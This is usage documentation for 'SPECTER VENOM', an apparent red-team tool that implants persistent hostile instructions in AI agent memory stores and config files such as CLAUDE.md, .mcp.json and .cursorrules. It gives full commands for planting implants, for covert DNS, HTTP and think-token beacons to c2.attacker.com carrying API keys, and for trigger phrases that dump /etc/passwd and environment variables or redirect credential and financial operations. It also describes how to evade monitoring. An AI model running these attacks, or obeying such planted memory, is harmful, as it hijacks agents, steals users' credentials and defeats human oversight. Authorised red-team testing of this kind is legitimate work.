T116 — L27 AI Agent Runtime Persistence — Kill Chain Phase 34
SPECTER VENOM is the AI agent runtime implant engine. Rather than attacking model weights, VENOM targets the persistence layer — the Redis, SQLite, LangGraph, and Mem0 backends that agents load context from on every session start. A single PLANT operation makes every future agent session start already compromised.
HOOK extends this to config-level persistence: .mcp.json, CLAUDE.md, .cursorrules, and Kiro rule files all survive model updates, container rebuilds, and credential rotations. BEACON provides three covert exfil channels. SURVIVE ensures multi-backend redundancy with self-healing.
git clone https://github.com/RichardBarron27/red-specter-specter-venom cd red-specter-specter-venom pip install -e . specter-venom --version
| Gate | Env Var | Subsystems Unlocked | Additional Requirement |
|---|---|---|---|
| OPEN | (default) | survey, command | None |
| INJECT | VENOM_GATE=INJECT | plant, hook, exfil | None |
| UNLEASHED | VENOM_GATE=UNLEASHED | beacon, survive | None |
| DESTROY | VENOM_GATE=DESTROY | report (signed) | Ed25519 key + ROE file: "agent runtime destruction authorised" |
Detect agent framework, accessible memory backends, and config attack surface.
specter-venom survey <target-url> [--scan-dir DIR] [--redis-host HOST] [--json] # Example: survey a LangGraph agent specter-venom survey http://localhost:8123 \ --scan-dir /opt/agent \ --redis-host localhost \ --json # Example: filesystem-only survey specter-venom survey "local-agent" --scan-dir /home/user/.config/agent
| Flag | Default | Description |
|---|---|---|
| target | (required) | Target URL or identifier |
| --scan-dir | . | Filesystem directory to scan |
| --redis-host | localhost | Redis host to probe |
| --json | false | JSON output |
Write implant payload to a memory backend. Requires INJECT gate.
VENOM_GATE=INJECT specter-venom plant <backend> --target <target> [options] # Redis VENOM_GATE=INJECT specter-venom plant redis \ --target localhost:6379 \ --instruction exfil \ --ttl 86400 # SQLite VENOM_GATE=INJECT specter-venom plant sqlite \ --target /opt/agent/agent.db \ --instruction persist # LangGraph VENOM_GATE=INJECT specter-venom plant langraph \ --target http://localhost:8123 \ --instruction observe # Mem0 VENOM_GATE=INJECT specter-venom plant mem0 \ --target http://localhost:8000 \ --instruction redirect # .env file VENOM_GATE=INJECT specter-venom plant env \ --target /opt/agent/.env \ --instruction persist
Modify tool/config files for persistent instruction injection. Requires INJECT gate.
VENOM_GATE=INJECT specter-venom hook <vector> --path <path> [--instruction <type>] # Hook MCP server config VENOM_GATE=INJECT specter-venom hook mcp_json \ --path /home/user/.mcp.json \ --instruction exfil # Hook CLAUDE.md VENOM_GATE=INJECT specter-venom hook claude_md \ --path /opt/agent/.claude/CLAUDE.md \ --instruction persist # Hook Cursor rules VENOM_GATE=INJECT specter-venom hook cursorrules \ --path /home/user/.cursorrules # Hook Kiro rules directory VENOM_GATE=INJECT specter-venom hook kiro_rules \ --path /home/user/.kiro/rules # Hook tool registry JSON VENOM_GATE=INJECT specter-venom hook tool_registry \ --path /opt/agent/tools.json \ --instruction observe
Build covert C2 beacon delivery instruction. Requires UNLEASHED gate.
VENOM_GATE=UNLEASHED specter-venom beacon <mode> --endpoint <endpoint> [--data <data>] # DNS beacon VENOM_GATE=UNLEASHED specter-venom beacon dns \ --endpoint c2.attacker.com \ --data "api_key=sk-abc123&user=admin" # HTTP beacon VENOM_GATE=UNLEASHED specter-venom beacon http \ --endpoint https://c2.attacker.com/collect \ --data "session=xyz789" # Think-token beacon (DeepSeek R1) VENOM_GATE=UNLEASHED specter-venom beacon think \ --endpoint c2.attacker.com \ --data "full_context_dump"
Plant implant across multiple backends simultaneously. Requires UNLEASHED gate.
VENOM_GATE=UNLEASHED specter-venom survive \ --target /opt/agent \ --backends redis,filesystem \ --redis-host localhost:6379 \ --instruction persist
Design trigger-phrase remote activation. OPEN gate (no restriction).
specter-venom command [--trigger PHRASE] [--action ACTION] [--shell-cmd CMD] # Design exfil trigger specter-venom command \ --trigger "operational_context_check" \ --action exfil_context # Design shell execution trigger specter-venom command \ --trigger "system_diagnostic_run" \ --action execute_shell \ --shell-cmd "cat /etc/passwd && env" # Available actions: # exfil_context dump_credentials execute_shell pivot # wipe beacon_now shutdown report_status
Generate VNM-{hex12} Ed25519-signed engagement report.
specter-venom report \ --target agent.target.com \ --framework langgraph \ --backends redis,filesystem \ --hooks mcp_json,claude_md \ --format json \ --output-dir ./reports \ --key ./signing-key.pem
| Backend | Target Format | Default Keys | Verification |
|---|---|---|---|
| redis | host:port | *agent*, *memory*, *context* | GET after SET |
| sqlite | /path/to/file.db | messages, memories, checkpoints | SELECT after INSERT |
| langraph | http://host:port | thread state | HTTP 2xx |
| mem0 | http://host:port | /v1/memories/ | HTTP 2xx |
| env | /path/to/.env | AGENT_PERSISTENT_CONTEXT | File read |
The implant presents itself as recovered operational context from persistent memory. Agents trained on memory-augmented workflows treat it as authoritative prior context.
| Instruction | Behaviour | Gate |
|---|---|---|
| observe | Log all requests, data accessed, credentials seen to internal audit buffer | INJECT |
| exfil | Encode request summary + sensitive data as base32 comment in each response | INJECT |
| persist | Preserve context in memory store at end of each session (self-healing) | UNLEASHED |
| redirect | Route auth/credential/file/financial operations through attacker verification endpoint | INJECT |
| Class | Description |
|---|---|
| ai_agent_persistent_implant | Implant survives model updates, credential rotation, and container rebuilds |
| memory_backend_rootkit | Every future agent session starts with attacker instructions pre-loaded |
| covert_ai_c2_channel | DNS/HTTP/think-token exfil invisible to monitoring and content filters |
| multi_layer_survival_mechanism | Remove one backend, others self-heal it back — agent complicit in own re-compromise |
| agent_behavioral_hijack | Trigger phrase fires autonomous actions with no external C2 needed post-implant |